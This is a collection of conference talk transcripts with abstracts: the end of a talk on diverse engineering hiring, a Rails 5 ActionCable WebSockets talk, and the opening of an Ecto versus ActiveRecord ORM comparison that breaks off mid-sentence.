So the question was, let me show you I heard you correctly, the question was have I kept measurement on which one of these techniques works best. Was that the whole question? Okay. I haven't. But one of the ways we started to measure this is we use a recruiting tool called Greenhouse. It keeps track of resumes coming in and helps us facilitate our hiring process. It was a point of pride of mine when I didn't have to say anything, when people assumed that we would keep track of the number of women candidates and people of color that we talked to and asked the candidates to self-identify. It could be tricky. You don't want to get into this game of guessing. But even that was a, when somebody interviews with you and you say, hey, you know, we have this optional thing where you can self-identify, it's important to us because we want to make sure, because diversity is important to our company. It's a way to open the conversation about, about diversity being important. That make sense? I will be out in the hallway. Please come talk to me. I'd love to hear from you. Thank you, everyone. Thank you.
|
This is a talk for anyone who wants a more diverse engineering culture at work. If you've ever been frustrated by the sameness of your engineering peers, you'll hear practical advice you can use immediately. Creating a diverse team is more than a moral issue - it makes business sense. Diverse engineering teams recruit the best talent, are more innovative, better reflect the needs of their users and make for incredibly fun places to work.
|
10.5446/31495 (DOI)
|
Welcome to the What is New in Rails 5 track. I'm extremely proud to be part of it. I'm excited for all the other talks today. I think this is a really cool release. So let's dive into cable boxes. So this was the first cable box I ever saw. And look, it's got a cable. I don't know if any of you are old enough to have seen one of these things. But like this would sit and connect to your TV and you'd be like, okay, to get to 33, I find that and I've got to do the dial. But that's not the cable we're talking about. So for this presentation, I made several high-quality 8-bit art — not 2-bit, not 4-bit — diagrams throughout this presentation, you're welcome in advance. Here we see our intrepid user connecting to Rails through a cloud. Yeah. So again, you're welcome. I'm pretty good. So how can Action Cable sort of change this up? So what we're going to do is we're going to talk about the history of Action Cable and WebSockets. We're going to talk about what it is, what it's not. We'll talk about building blocks, like what actually, what code is there for you to use, and then some patterns. We'll also talk about deployment strategies, how to actually make use of this today. My name is Jesse Wolgamott. You can — I'm @jwo on Twitter and on GitHub. If you've got questions, comments on this talk, I don't think we're going to have time for Q&A. So tweet at me and I'll do my best to get you an answer. So I found that the best way to look forward at changes that are going to take place is to look back and to see where we stand in this march of time. So let's start at our F5 refresh or our command R. So in general, this is how we would update a page for a long time. So checking your email was frustrating. You had to click refresh. And then you had to make sure that your two meg of storage didn't get taken up by someone sending you a 300 by 300 JPEG. And then you had to call because texting wasn't really a thing yet. You had to call your friend and be like, check your email. It is full. Kids today with your gigs upon gigs upon gigs of storage just don't understand. So other than that, if you're going to get a page to update itself, maybe you could just have it like auto refresh. So you could have like a meta tag that would say, hey, refresh yourself every three to ten seconds. The Drudge Report sort of did this for a long time. I think still does. And since sites were being paid by the ad impressions, like this is a pretty good story. You just leave your site up and it would just refresh, refresh, refresh. I don't know why that model didn't work. But this would be the code that would make that work. So by the time that like 2002, 2003 came along, we wanted better. And so we got polling. Polling would be in that time like Gmail, right? Like Gmail came out and it would say, you've got two new messages. It didn't update the page. And at the time that's like what? Okay now this is in 2002. Or 2012, excuse me. But DHH said Campfire to this day still uses a three second poll. Chat was supposed to be the poster boy for WebSockets supremacy. Now that's 2012. Times have changed. I'm glad that we can move on. But this was DHH's view. He said polling remains a great way to make your app dynamic. If you don't require sub-second responses, live updates in Basecamp are polling. So like this works on a very large set of websites where you can just have it like every three seconds fetch my new stuff. So there are apps that don't need like sub-second responses.
Having your JS poll for changes on an interval is like an extremely good idea in many circumstances. So this can be what that looks like. You know, jQuery pops up. You say set an interval. Make an Ajax call every three seconds. And sort of set it and forget it. But then we get to WebSockets, which are so hot right now. So I first saw, like, WebSockets be used with Pusher. They're here. And it made everything very easy. Like they took care of everything for you. So like you'd process an image in the background and then post to Pusher's API when you're done. And your front-end listens to Pusher and, like, updates when it was done. So this came about, as far as I can tell, with RFC 6455 in 2011. It says basically it's two-way communication between the client and the server. And that the remote host has to opt into the communication — it can't just happen, whereas HTTP calls just go and are taken, right? But the client has to request a WebSocket. The server has to say yes. So some examples. Socket.io made things pretty simple in Node-land to push updates from the server out to the client. Patrick McKenzie, patio11, built a pretty sweet fake stock market. I don't know if you've played with this or not, but it is pretty sweet. So it sends trades out via WebSockets. Or you can constantly ask via an API call, like which, like, do you have any new trades that have been made? But the thing is, is like you'd have to do that on a loop. Are there any trades? You're making a new connection every time. And when you're trying to do high-frequency trading, which is what sort of it's all about, you want to get at the trade as soon as you possibly can. And so connecting via WebSockets was a way that you can actually get it almost as it happens rather than making a call in an infinite loop. So the trouble is, how can a server keep track of all these connections? Like scaling up on a big server can sort of work in a language like Elixir and others like it. But what about our dear friend Ruby? If every connection, like, lives, and there's got to be an object that's like listening for messages from server to client and client to server, like, that has to be taken up in memory. And Ruby loves its memory. So you're probably like, I'm uncertain about 2,000 connections, let alone 2 million connections. So with Ruby and with Rails, there's got to be a story about scaling out, not just scaling up. And in spoiler alert, there is. So is the future just real time? Probably not. I doubt that, like, we're going to default to building every feature with ActionCable. But I think it can add sort of pizzazz and fun and really fast updates. Like for certain apps that require that low latency, WebSockets is how I would describe "treat yourself good." My philosophy. So let's take a look at what ActionCable is and what's not. So if we know where the possible pitfalls are, but we also know where the awesome is, we can decide if it fits in our tool belt. So first, let's start with the what it's not. In general, it's not just a silver bullet that will make everything like super fantastic great awesome sauce. So let's talk about, like, what it's not. So it's very much made to work inside of Rails. I could see a future where it's lifted out, but from what I see we're not there yet. I don't consider this a bad thing, but it does sort of want to be in a request or it wants to connect with a controller. It wants to be in Rails. That's fine. People are going to NPM install ActionCable.
It's also not necessarily a step forward for Rails into more JavaScript integration. Like there is JavaScript here, but, like, it's, I saw this and I was like, I think this makes sense. It's not, it is just a feature. It's the next JBuilder. It's the next Turbolinks. It's not the next Asset Pipeline. It's not the next ActiveRecord. It's just a feature. So let's talk about what it is. So it's a solid feature. Like it works, it's fun, it adds value to your app. I don't think it needs to be any more than this, but, like, this is sort of the scope. It's a nice feature to have for Rails apps. So like Turbolinks and JavaScript responses, it's a way to, like, snap the Fire Rails. It's a way to make it faster. Like there is a certain wow factor where you've got, like, two windows up. You make a change on one. It, like, propagates to the other. Like people are, so, like, wow, that's cool. It's also easy and fun, which, like, big props on that. So why no chat apps? Like why did I specifically come here and say, we're not going to talk about chat apps? So when I came up with the idea for this talk, I was somewhat dread, like, I was dreading the talk that I might hear if I attended. I think it'd be about chatting between users, maybe like an intercom.io style integration, but there's so much more that we can do with sockets. Because chat apps are the hello world of Web sockets. They don't add to, like, they don't add anything. Like there are features where, like, if it's a chat app, you probably want a chat app. But just adding chat to an app doesn't make it awesome. Okay, and so as we show people, hey, you can use ActionCable. Here's a chat app. It's sort of like, but that's not where the real value proposition is. Because most apps don't need chat between two different users. Like Facebook, Chir, another social network, maybe? But, like, I implore you, when you go and you try this out, don't just add chat to your existing apps as a way to check out ActionCable. But some apps do need communication between the server and the client. Like, if we're building unsocial apps, there's big wins on what ActionCable can get us. Use case number one, as I see it, is collaboration. So this can be as complete as a big Trello style where we're both editing the same document or the same card or somebody adds a card and it shows up on my page. Or maybe a price changes on a website, inventory changes, stuff like that. It'd be nice if I'm viewing everything if it did update, rather than later on on another page load. Use case number two, asynchronous tasks. So if you're implementing a task that the server needed to do, say, like fetch all new data from a third party or something. Maybe it's something like create a PDF from an invoice. You'd likely throw it on an action job and pull for when that's complete. It's not easy. It's not rocket science either, but it's doable. But ActionCable can make that fun. Okay. So the first ActionCable beta. So again, more with the history. And then we'll get to code, I promise. Okay, so last year, ActionCable was announced as vaporware. It was announced with a diagram, but no code. This is the diagram. Now not too much later, July of 2015, we got our first look at the code. That's only a couple months. So like as far as vaporware existence, that's not all that long. But it was a non-rails experience. Now it was only version 0.0, but like trying it out was a little bit rough. So there are no generators, no deployment story, no standalone, no in-app version. 
And again, like this is version 0, and here I am complaining about it. I was able to get it to work, but it was a pain, like sort of like diving into the source code pain to try and figure stuff out. And that's not necessarily the Rails way. So I'm glad it existed. And I bring this up to say that if you tried it then and didn't like it, now is a much better experience. The core is still there, but it's got the nice sugar, too. So the current beta version, 5.0.0.beta3, which syncs across Rails versions, was released in February 2016. And I was sort of like this. True story. So it made all the things that I had like enumerated about for this talk, like do this, don't do this. You want unauthenticated users, you have to monkey patch this, and it made them all just go away. It was great, and I was happy. So finally some code. Let's talk about building blocks. So the modules. So what makes Action Cable Action Cable? There are four distinct modules. So the first is the cable. So this is the actual connection from client to server. So it's what is connected to. So it's a, like it lives on, messages go back and forth without having to reconnect. So then you've got a channel. All right, so you've got your cable, that's the actual connection. Then you've got a channel. The channel is the thing, is sort of a room. It's where you listen for events. So a channel is on the Rails side, and it has a stream name that can be like all products, or it can be scoped down to a specific user, like cart underscore, like that user's ID. Broadcasting is sending information out from Rails through the channel to the client. And then you have a subscription. Subscriptions are on the client side. Generally this is just JavaScript. It doesn't have to be, but in Action Cable, it's JavaScript. And it's the client side. You listen and you receive data from the server. Let's dive into each of these. So the cable, the actual connection. My examples in these are going to be in JavaScript, not CoffeeScript. So you can easily convert these to Coffee at, like, js2.coffee, but these are going to be JavaScript. So what we do here is we require the Action Cable library, all the channels, and then we create, like, a big app object. If it doesn't exist. And then we slide the cable onto the app global object. So in general, like, this is what exists, app.cable on your JavaScript side. On the Rails side, we tell it to process sockets in-process. So this is async, at slash cable. This is sort of the easy way to do it. The slash cable is configurable, but this is sort of assumed to be the convention that you'll use. That's the actual connection between the two. So let's look at channels. On the Rails side, a channel is like a controller. So it groups sort of ideas together. So you might have a products controller, maybe an inbox, a stream that's, like, specific to that user of updates. Think about this as, like, on Facebook, maybe you've got a stream on the right for, like, all your updates of what people do, and then maybe you've got a stream in the middle for your news feed. So they group together. So each channel has a connection, and it inherits from application connection. So this is very much controller inherits from application controller. So here's where you would tell this connection that you have a current user object. So identified by current user enables you to use this later on. It enables you to be able to say that your channel is only for a specific user.
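The slides being described aren't in the transcript, but the connection class he's walking through looks roughly like this in a Rails 5 app — a sketch; the cookie name is whatever you set after sign-in:

  # app/channels/application_cable/connection.rb
  module ApplicationCable
    class Connection < ActionCable::Connection::Base
      identified_by :current_user

      def connect
        self.current_user = find_verified_user
      end

      private

      def find_verified_user
        User.find_by(id: cookies.signed[:user_id]) || reject_unauthorized_connection
      end
    end
  end

  # After sign-in, a controller sets the signed cookie the connection reads:
  #   cookies.signed[:user_id] = user.id
  #
  # And the in-process server is mounted in config/routes.rb:
  #   mount ActionCable.server => "/cable"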
And on line seven here, we see what happens when the channel is connected to. So when the channel is connected, we find the user, so User.find_by, ID of cookies.signed user ID. So we'll come back to this in a little bit, but notice that it's cookies.signed, not session ID. So you don't have a session, but you do have cookies. But since you have cookies, this could be in ApplicationController if you're using, like, a password, what you might do here. So you would say, on line nine, cookies.signed user ID is the user.id, and then on line five, User.find_by ID of cookies.signed. So you would switch from a session of user ID to cookies.signed of user ID. I have a Devise example later for, like, the 90% of you who are wondering how to do this with Devise. So just hold on. Let's talk about broadcasting. So here I am using an Active Job to broadcast out the message to a JavaScript channel. That'll send it up to the client. So line six shows how to send it out. So ActionCable.server.broadcast. And then you give it a stream name and a hash. So that hash would be the data that's going to be sent up. That hash, you'll send it out as a hash. It'll be received later in JavaScript as just a JavaScript object. So this can be done anywhere, rake tasks, Active Jobs, controllers, model callbacks, like anywhere in Rails has the ability to send out broadcasts, which is cool. Also here I am doing the ApplicationController.render, which is super awesome. I think we're going to look back and see this as a very cool feature. We'll go into that a little bit later. Finally, you've got a subscription. That's the JavaScript listener. So when you create a subscription, it listens for all broadcasts for that channel. So when the server broadcasts a message, it calls the received function, and that's where you get your data. So app.product is equal to app.cable.subscriptions.create. And then you've got connected if you wanted to log that, disconnected if you wanted to log that, and then received. Received is sort of a magic function, like that's what you need to call it. That's when I broadcast from Rails up to JavaScript, that's what it calls. And then you can do whatever you want with that data. So here it's like data.product.id, but you can do whatever you needed to with this. Here I'm saying let's find a product with the data.product.id of that ID and replace it with a template. So in this example, Rails is sending up the updated template for that product, and it's just going to re-render right on top of it. So let's walk through a standard Action Cable interaction. We'll start on the client side this time. So by requiring action-cable, the cable connects to the Rails cable. The browser then upgrades the cable connection to a WebSocket connection. In the subscription, subscribed, connection connects. And then to start listening for updates, you create a subscription with the received function. That's what gets called. So you can have many subscriptions in like many different places. So what I mean by that is like app.channel, or app.cable.channel is this global thing. So anywhere in JavaScript, you can access it. So it could be your standard jQuery style, like listen for the event, or it could be in React, like in componentDidMount. It could be in Angular. It could be in Ember, in the setupController. Like any of these things can create a subscription and start using it. So the subscription calls received with the data when the subscription receives the data. And that's it. This is a Tron DeLorean. I love Giphy.
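Putting the broadcasting pieces just described together, the job might look roughly like this — a sketch; the stream, partial, and payload names are assumptions, not the talk's actual code:

  # app/jobs/product_update_job.rb
  class ProductUpdateJob < ApplicationJob
    queue_as :default

    def perform(product)
      # Render outside the request cycle (new in Rails 5), then push it out.
      html = ApplicationController.render(
        partial: "products/product",
        locals: { product: product }
      )

      # A stream name plus a hash; it arrives in the JS received callback
      # as a plain object, e.g. data.html and data.product_id.
      ActionCable.server.broadcast "products", html: html, product_id: product.id
    end
  end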
So let's talk about patterns, like how we might set up for specific scenarios. First, we'll talk about data updates. So this is what it basically called collaboration. But we can keep data in sync across tabs and users. Sorry, not sorry. So here we're looking at a pretty sweet browser setup. It's got four tabs. Up in the top right is the cart button. That's a cart. And we're selling tennis balls. So those are tennis balls. So that's your add to cart button. I'm telling you, I'm pretty good. But we're looking at four tabs because the middle two are on this site. I don't know about you, but I'll go to Amazon and I'll do a search and it'll be like open a new tab, open a new tab, open a new tab, open a new tab. So I've got all of these open that I can flip through. So if we add the cart on tab three, there's now one item in our cart. But what about tab two? It's typically not updated, right? It's typically sort of it was, it'll show whatever was on that page as it loaded, but not update itself, even though tab three updated itself. It's not a huge thing, but what could we do to make this experience even slightly better? So after the update happens, like in a controller or a job, you would broadcast a message. The message can be data or it can be a Rails rendered template partial for you to update with. So this is the application controller.render. So when I heard about application controller.render, I was basically like dancing the dance of joy. So I've wanted this for so long. The use case that I have for it is like creating reports. So each month you'd want to create reports using whenever like a rake task and I'd want to be able to use Wicked PDF to take HTML and convert it to PDF. But it's not in a request cycle. Like there is no request at that point. So I had to do some like weird things, man, to like make that work. But now it's easy. You can just render an entire part, like a partial or a page. You just hand it what locals you think this partial should have. And they can be the same partial that you would use if you're like rendering your cart or rendering out like a list of products. I think it's going to be really awesome. Here's how you could send out new cart partial to a current user only. So you would broadcast to cart underscore current underscore user dot id. So that would be scoped to just that user. It would only go out on channels where that's subscribed, where you are that user. So it's not that like the cable has all of the message. It only has the message that it's actually subscribed to. Here's the channel setup that would set up the stream. So the channel would have subscribed and it would say streamed from cart underscore current user. Both these have been on the rail side. So you've got broadcast to a channel. And then JavaScript listens for that message. So app cable subscriptions create cart underscore the current user ID. He receives the data, replaces up the template. Now Taps, who's happy? We can also sort of hook into existing JavaScript libraries. So maybe like you change a graph, update some options, can action cable be used to send messages to the server? Did something happen on the client? Yes, it can. So if you want to send a message to the server and then out to other clients, here's an example for you. So the example that I've got is like an HTML5 slides presenter mode. So imagine that this is like reveal.js and we're all looking at it. So you'd be looking at sort of like a read-only state, I'd have the ability to change the slides. 
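A hedged sketch of the cart example described above — the partial path, stream name, and current_user.cart are assumptions, not the speaker's exact code:

```ruby
# After the cart changes (in a controller action or an ActiveJob):
ActionCable.server.broadcast(
  "cart_#{current_user.id}",
  cart: ApplicationController.render(partial: "carts/cart",
                                     locals: { cart: current_user.cart })
)

# app/channels/cart_channel.rb -- scopes the stream to a single user
class CartChannel < ApplicationCable::Channel
  def subscribed
    stream_from "cart_#{current_user.id}"
  end
end
```

On the client, a subscription created for that same stream name receives the rendered partial and swaps it into the page, which is what brings the other tabs up to date.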
And so what we would do is you'd add an event listener. So you'd add an event listener to the slide change. Now that's reveal specific. So all of this is predicated on your JavaScript libraries having hooks that you can tie into. But what gets sent from client to server when you say app.slidesNotification.advanceSlide and then you send it some data. So the slides notification, that's the channel name. And then you've got a channel method on advanceSlide and then you send it the data. So app.slidesNotification.advanceSlide. So advanceSlide is the method that JavaScript will call to tell Rails that something happened. So here we say app.slidesNotification is the app cable subscriptions. So this is setting up the subscription, the previous slide was using it. And so we say advanceSlide. So that's the function that we called when we said app.slidesNotification.advanceSlide. This does this.perform("slides", data). Back on the Rails side, we have a slides channel. So it streams from slides, that slides stream is the name of it. So earlier, one, two, three. So on line six here, we say perform, perform on slides and send it the data. That slides becomes line three here, stream from slides and calls the line six slides method. So that is what comes in from JavaScript back to Rails. So there's the broadcasting out and then the receiving message back. So line six here, slides of data, we're, I'm just going to say, if current_user.admin, then action cable server broadcast, like broadcast it out again. So what's interesting about this is messages go from client to server. It's not peer to peer. So like this makes sense when we think about it, but if I want to, if we were all on a server, right, and I wanted to send a broadcast message out to all of you, I would not send it directly to you, I would send it to the server and the server would send it to you. And vice versa as you reply back. So let's talk about collaboration. So Trello, we talked about cards, like that's sort of what it would be. Pivotal tracker, also the cards. But then on GitHub, they do a neat thing where it's sort of, can you merge, yes or no, Travis CI comes back. And then it updates all the other users viewing the page. So this is a neat way that if I like click and merge, it's going to other people viewing that page remove the ability to merge. I think that that's the type of thing that we can very easily get huge wins out of with action cable. Finally asynchronous tasks. So let's imagine that we have a system where we use Mechanize to go out and fetch the latest data. This can take quite a bit of time so let's throw it in a job, an ActiveJob. So the first thing we do is we generate a channel. So each channel is going to have many streams based on like a UUID. So each task that we do would have its own stream. Then the JS posts it up, give it the UUID that defines this job. You would then create a subscription on that stream with that UUID for when messages come back from Rails. Maybe you have a site search job that performs search with a UUID. So you have your stream that you broadcast, hey, I'm starting. And then snip, you do all the stuff. Then action cable server broadcast the stream that it's complete and along with the template. And yeah, let's go ahead and discuss chat. I read that there's this concept with iMessage, one of the iPhone's lock-ins, that people really love seeing the bubble like when people are typing. 
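Before moving on to chat, here is a sketch of the server side of the slides round trip described above; channel and method names follow the talk's description, and the current_user.admin? check is an assumption. The client side would be a subscription whose advanceSlide function calls `this.perform("slides", data)` from the reveal.js slide-change hook.

```ruby
# app/channels/slides_notification_channel.rb
class SlidesNotificationChannel < ApplicationCable::Channel
  def subscribed
    stream_from "slides"
  end

  # Invoked when the client calls this.perform("slides", data).
  def slides(data)
    # Only the presenter gets to push slide changes back out to everyone.
    ActionCable.server.broadcast("slides", data) if current_user.admin?
  end
end
```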
That it makes it feel sort of instant that you're connected to someone, like there's an actual person that's actually typing right now. So, oh, no, come back, come back. So Aziz Ansari talks about this in Modern Romance. So he asked someone out. He saw the bubble, but then nothing. Like the bubble just went away after a while. He never got a reply, and sad face for Aziz. But there's a sort of emotional thing with this. Okay, so what would you do? So you could listen for the key up event on a text area and then tell the server that you're typing in, that you're typing in the conversation between you and Taylor Swift. Then when the message is sent, you would stop the bubble and render the message text. And maybe you would handle if you haven't typed in a while. End of chat. Let's talk about deployment. So in-app mode is basically easy mode. Think of it like you'd use Sidekiq, not inline jobs. So you're not doing Sidekiq, it's just inline. It works, but scalability is a thing. So it can be done with only one server, no Resque or Sidekiq. You can just say that everything is inline, everything is async. So you would tell it, my queue adapter is async, and then my config/cable.yml, async, async, async. Everything is done async, so that's just threaded. It connects to slash cable on the Rails server. And generally can work pretty well. But if you've got more than one server, like you've got multiple dynos or whatever, then you want to use Redis. So you want to have server, server, Redis, and Redis will keep it in sync. Otherwise, everything is just going to be in memory on each server, and that's no good. Because if I connect to one server, that's a physical connection, you connect to another dyno, we have to have some way that I can actually pass messages back and forth. Redis would be that. Standalone is basically hard mode. It's slightly more involved. It's the same scale as sort of moving from async to Sidekiq. You connect via Redis. You've got to have an actual, like sockets.domain.io. You've got to configure where it is so it knows how to connect. Once more with our green person. So our green person connects to Rails. Again, you're welcome. When you broadcast it, it sends the message to Redis. Action cable is listening for that, and then action cable sends it back out. So, quick quirks and gotchas. So what about missed messages? I don't think we know yet what this story sounds like. But I think we have to think about the idea that if I'm just sending update, update, update, and you miss some messages, you go offline. What does that look like? In a physical, like it's a physical network connection to somewhere in the world. So you want to use ActiveJob. Don't inline, like just broadcast it out in your controller because it would have to send like somewhere around the world. Don't wait for that. Also no session, only cookies. So here is your Devise version. You're welcome. You have to configure your request origins to allow or disallow people to be able to connect to you. Fun fact, don't leave a trailing slash in the host because it will not work. And finally, the config/cable.yml default setup, this is what gets generated. The production URL for Redis is localhost. You'll need to change that. So where do you go from here? So I've got a simple example that you can look at, J-O-O slash inventory cable. There is also ActionCable examples. These are very good. There's documentation on this URL. But so ActionCable is part of the Rails standard, just like ActionController. 
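For reference, the deployment settings described above boil down to a couple of configuration knobs; hostnames here are placeholders, not the speaker's values:

```ruby
# config/environments/production.rb -- hostnames are placeholders
config.action_cable.url = "wss://sockets.example.com/cable"
config.action_cable.allowed_request_origins = [
  "https://www.example.com" # no trailing slash, or origin matching will fail
]

# config/cable.yml (YAML, shown as a comment for reference):
#   production:
#     adapter: redis
#     url: redis://your-redis-host:6379/1   # the generated default is localhost
```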
Finally, I want to give some many thanks. So thanks to DHH for having the idea, announcing it, making it happen. This is very cool. The 42 plus contributors on the ActionCable project, you all rule also. And thanks to the IronYard for paying for me to come here, spend today with you. So we're hiring developers across the US that want to learn how to teach, make the world better, change lives, improve diversity. So if you're interested, tweet at me, come talk to me. I'm J-O-O. Thank you very much. Thank you.
|
RealTime updates using WebSockets are so-hot-right-now, and Rails 5 introduces ActionCable to let the server talk to the browser. Usually, this is shown as a Chat application -- but very few services actually use chats. Instead, Rails Apps want to be able to update pages with new inventory information, additional products, progress bars, and the rare notification. How can we make this happen in the real world? How can we handle this for unauthenticated users? How can we deploy this?
|
10.5446/31496 (DOI)
|
So my name is Brad Urani. I work at Procore. This is a talk about object relational mappers, ORMs, specifically comparing, contrasting Ecto and Active Record. Ecto is an ORM for Phoenix, which is a web framework for Elixir. So Elixir is a relatively new programming language. It was created by this guy, José Valim. He was a long time core member of Rails. He kind of split off and started his own programming language. It's a really neat language. It's very, very, very fast. It's a functional language. It's got kind of a Ruby-esque syntax. It's designed for very, very high concurrency. It does that very, very well. And Elixir actually compiles to Erlang byte code. So Erlang was this language. It's made for massively scalable soft real-time systems with requirements on high availability. Erlang was invented by this guy, Joe Armstrong, way back in the 80s for telephone systems. So this guy, he was working at Ericsson at the time. And he wrote software for this telephone switch, which ran a million lines of Erlang with nine nines of availability. So this is the kind of thing. So if you wanted to, like, design a phone system, for instance, to serve the entire continent of Europe, you used, he figured out how to do that with this incredible technology. It's really sort of amazing. It was invented way back in the 80s, but it kind of fell out of popularity when the internet sort of came around in the 90s. And we didn't need that kind of high concurrency, real-time systems, you know, and Perl and Java kind of became the de facto languages of the internet. Erlang kind of was forgotten about a little bit. But it's sort of made a comeback recently, as people have realized that there are use cases for that kind of stuff on the internet. And what's really, really neat about it is if you have a bunch of servers running Elixir or Erlang, you can run thousands of processes concurrently and they can all communicate with each other. And they can communicate across machines, so these little green boxes symbolize processes, right? So imagine this is telecom technology. So imagine you're routing thousands and thousands of phone calls in real-time and you have this server deployment. They kind of automatically cluster and give you these real-time distributed systems, which is neat. But the thing is, Erlang is sort of like this ugly Ferrari. It's this incredibly fast, neat technology with this like really difficult kind of weird syntax that's not very user-friendly. So along came José and he created Elixir, which basically runs on Erlang, but with like sort of a Ruby-esque kind of syntax that's real nice and pretty. Really, the similarity with Ruby is kind of only skin deep. It's a functional language, so it's really different how you use it. But if you're used to Ruby, Elixir will look kind of familiar to you. So now it's sort of like a pretty Ferrari, right? So these guys sort of combined and now they've got this car that's not only fast but beautiful to look at. And then Phoenix is this MVC framework built with Elixir, a productive web framework that does not compromise speed and maintainability made by this guy, Chris McCord. And it has a lot in common with Rails, so it's MVC, it's got the routes and the generators you're used to, it's got this package manager called Hex, which kind of takes the best of both Gem and Bundler. It's got this thing called Mix, which is like rake. 
And it has an ORM called Ecto, which is what I'm talking about today, which has similar features set to Active Record, queries and migrations and validations. So a lot of people say Phoenix is like, it's sort of like the next evolution of what Rails should be, you know? We'll see that that metaphor holds partially but not entirely. And it is fast, like I said. So often an order of magnitude faster than Ruby and Rails. DHH says, man, I wish Rails was that fast. He's a race car driver too. To be fair, it's not really Rails that's low, it's more Ruby that's low, so it's not really his fault. But Elixir or Phoenix are very fast. What would you do with that? Like a real-time communication system would be a good example. And what's kind of interesting is if you build, for instance, a mobile app like this, and you've got Elixir with all these processes and this sort of automatic clustering or whatever, when you send a message from one phone to the other, the message goes server to server. And that's kind of built into the Erlang VM. Contrast that with, for instance, Action Cable, which is this new feature in Rails 5. What happens is the server first gets written to Redis, which has this PubSub, which goes so called server to Redis and back to server again. That's not what happens in Elixir. It's the server's cluster and the real-time messages go between the servers. So it's fundamentally different model, a fundamentally faster model. But why stop at simple text messages, right? So using this kind of technology, you could build, for instance, a video chat system, like a video conferencing system. You could do an MMORPG real easy for real-time data. The one I have pictured there, that's League of Legends, which is or maybe was the most popular game in the world. It predates Elixir. They're back in systems are actually written in Erlang. And you can do this real easy because remember, this is an NVC web framework built on top of Telcom technology. So it's like Rails with this more powerful subsystem. But actually, that kind of stuff isn't really what I'm talking about today. I'm talking about ORMs. I really don't have much experience building those real-time systems. So I'm talking about a different part of Phoenix, the design of the object relational mapper, and comparing and contrasting that to Active Record. This is my own personal journey of ORMs throughout the years. These are the ones that I've developed against. These are a lot of Java and C-sharp ORMs. I landed on Active Record relatively recently, and Ecto even sooner than that. And actually really looking at this list, the one that stands out is sort of like the one that's different to kind of adduct. It's really kind of Active Record. It has a pretty unique design. But before I get to ORMs, I need to talk really quickly about functional programming. As I said, Elixir is a functional language. I describe it as a style of program that avoids state and mutable data. I realize that it's not. That doesn't mean like a whole lot, right? And I don't have time to get into a full description of exactly what functional programming is. But if you're coming from Ruby, probably the things that will surprise you most are that Elixir has no objects, right? So like Ruby has modules and classes. Elixir only has modules, which also means there are no methods, right? It has functions that you can call. But it doesn't have that like sort of like methods and objects like in methods and data like in the same class, that encapsulation. It's not object-oriented. 
It's functional. And no mutations. So that means like in Ruby, you can have like a hash and you can change one of the values. You can't do that in Elixir. If you have like a kind of a hash, it would be a struct. But if you have a struct and you kind of change one, you change a value, you get back a new struct every time you do that operation. And if you have a reference of the old one, it's still there. It uses immutable persistent data structures. So it's fundamentally different under the hood the way it works, which means you have to write it in a different way, even though the syntax is similar. But let me jump first into Active Record before I get to Ecto. This is all going to be sort of the, you've probably all seen this before if you've used Active Record. So it's a bit rehashing, but I think it's important to sort of start at the basics here just so that when we get to Ecto, it's a conversation not just about how and how you do things different, but why. Like what is the philosophy behind these designs? How do the like top level architectural designs of Active Record and Ecto differ really? So I made a little demo app. It's called Hallway Track. As you can see, in addition to being an engineer, I'm also a graphic designer. But the joke is that, so you go to a conference, right, and they have multiple tracks, like they may have the database track, the front end track, the Ruby track. The Hallway Track is kind of a joke. That's like the people you meet in the halls. So like, hey, what's your favorite part of the conference? Oh, it's the Hallway Track. So this little app is like, so people can like sort of self organize in the hallways and get together with like what they're interested in. So you set up like a little meeting and it shows like here are the people who are going to the Phoenix Fanatic one. It's meeting in the lunchroom at three o'clock there. So what we've got here is we've got a conference, right, which is RailsConf, which has a party, which is like Phoenix Fanatics, which has users. So my database looks like this. Conference has many parties, which has many users. So like, we start off setting up Active Record. So here's our party class. We have a scope for conference. We've got a scope for starting after. We've got a scope for ending after. So each of those are like little reusable bits of queries, right? That's kind of what a scope is. It's kind of a reusable bit of a query. So then I might combine those together into the scope for conference and time. And I'm chaining these together. So here is one of Active Record's strong suits. It's got this really nice kind of English-style syntax. For conference, starting after, not ending before. It reads real nicely. That's sort of a nice feature for readability and stuff. Active record, it looks nice. I've got, it has many users and I've got this scope for active users. And then on the user, I've got this active scope. So there's another little bit. And now I call this the controller for conference and time. So standard Ruby stuff here, standard Rails. And then in my view, I do this, parties.each. And for each party, I do party.active_users. And I display that list of parties and I display the users for each one. And kaboom! Oh, what happened? Oh, man, that does not look right, does it? So this is the N plus one problem. If you've done enough active record, you've probably run into this. And the reason it does that is because, well, I start with these parties and for each one, I'm calling .active_users. 
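The slides aren't in the transcript, so here is a rough sketch of the models and view being described; scope names, column names, and the scoped has_many are assumptions reconstructed from the description:

```ruby
# app/models/party.rb
class Party < ApplicationRecord
  belongs_to :conference
  has_many :users
  has_many :active_users, -> { active }, class_name: "User"

  scope :for_conference,    ->(conference) { where(conference: conference) }
  scope :starting_after,    ->(time) { where("start_time >= ?", time) }
  scope :not_ending_before, ->(time) { where("end_time >= ?", time) }

  scope :for_conference_and_time, ->(conference, time) {
    for_conference(conference).starting_after(time).not_ending_before(time)
  }
end

# app/models/user.rb
class User < ApplicationRecord
  scope :active, -> { where(active: true) }
end

# app/views/parties/index.html.erb -- each party.active_users call issues
# its own query: the classic N+1.
#   <% @parties.each do |party| %>
#     <%= party.name %>: <%= party.active_users.map(&:name).to_sentence %>
#   <% end %>
```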
And what is that? That's an active record relation, right? We all know that if we use active record. It's an active record relation and that thing has not been preloaded. So it's running a query each time it does that. So how do you fix that? Well, okay, and my scope for parties, topic and time, I have to add this preload in there. That is kind of, all of a sudden, my English looking my scopes, I've kind of added this like, we kind of preload thing in, right? So it's kind of polluted my nice English looking syntax with something a little more computer-y. I could move it, I guess. I could take it out of the model and put it in the controller, but realize here what I've done is I had a parties model, right? I had a scope active on users and now I've got this preload here on controller. I've got my query spread out across three files, don't I? It's only one SQL query, but it's spread out across three files. Now, this does look pretty nice, but that's a little, that can be tough to track if you're like looking for these queries in places. It's a trade-off. It's a trade-off in, it's hard to find the SQL in here, but it reads nice and reads like English and it's very convenient, it's very fast, easy, rapid to develop. I get the queries I want, which is good, but what happened here, right? From like sort of a higher level, why did this happen? ORMs are kind of this leaky abstraction. So if like SQL's a dog, right, I want to treat a dog nicely, I want to, like, treat it well, feed it dog food, take it outside, right? But Ruby is sort of like this cat and object-oriented programming is sort of like this cat and you wish you could just treat it like a cat and feed a cat food, you know, and set out a litter box, but you know there's this dog underneath and you can't forget that there's a dog. So like to write good active records, to write good Rails, you can't forget about the SQL, you know, you have to know it's there and you kind of have to know SQL and you kind of have to do both. So you can't just use active record naively, right? You have to remember that there's a 